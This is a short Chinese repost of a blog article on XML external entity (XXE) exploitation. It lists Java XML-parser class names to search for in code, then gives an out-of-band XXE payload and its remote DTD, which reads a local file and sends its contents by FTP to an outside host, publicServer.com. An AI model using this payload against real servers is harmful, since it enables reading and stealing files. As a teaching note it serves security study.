XXE的各种利用

简介:

【转】http://www.freebuf.com/articles/web/97833.html


1
2
3
4
5
6
7
//解析xml关键字:
DocumentBuilderFactory
DocumentHelper
SAXParserFactory
SAXBuilder
SAXReader
unmarshal



使用 FTP 协议,攻击者可以读取到任意长度的文件。

1
2
3
4
5
<? xml  version = "1.0" ?><!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd">
%remote;
%send;
]>< data >4</ data >

文件位于:http://publicServer.com/parameterEntity_sendftp.dtd

1
2
3
<!ENTITY % payload SYSTEM "file:///sys/power/image_size">
<!ENTITY % param1 "<!ENTITY &#x25; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;

这种攻击需要配置 FTP 服务器。不过,这个 POC 代码只需要稍作调整即可用于任意的解析器上。


















本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/1944264 ,如需转载请自行联系原作者





相关文章
|
8月前
|
XML SQL Web App开发
用友 GRP-U8 Proxy XXE-SQL注入漏洞
用友 GRP-U8 Proxy XXE-SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息,具体复现操作请看下文。
253 1
|
8月前
|
XML 安全 测试技术
XXE 外部实体注入漏洞
XXE 外部实体注入漏洞
69 0
|
4天前
|
存储 安全 JavaScript
HW常见攻击方式 --XSS跨站脚本攻击
HW常见攻击方式 --XSS跨站脚本攻击
49 0
|
11月前
|
XML 安全 Java
代码审计——XXE详解
代码审计——XXE详解
197 0
|
12月前
|
XML 存储 安全
WEB漏洞 XML & XXE漏洞
WEB漏洞 XML & XXE漏洞
|
12月前
|
XML 安全 网络协议
WEB常见漏洞之XXE(靶场篇)
WEB常见漏洞之XXE(靶场篇)
641 0
|
12月前
|
XML 存储 安全
XXE 漏洞任意文件读取
XXE 漏洞任意文件读取
445 0
|
JavaScript 安全 数据安全/隐私保护
dvwa下利用xss获取cookie并利用(绕过验证)
dvwa下利用xss获取cookie并利用(绕过验证)
560 0
|
XML 供应链 安全
Apache Jena XXE漏洞(CVE-2022-28890)
Apache Jena XXE漏洞(CVE-2022-28890)
|
XML 安全 Java
网络安全-XXE(XML外部实体注入)原理、攻击及防御
网络安全-XXE(XML外部实体注入)原理、攻击及防御
353 0
网络安全-XXE(XML外部实体注入)原理、攻击及防御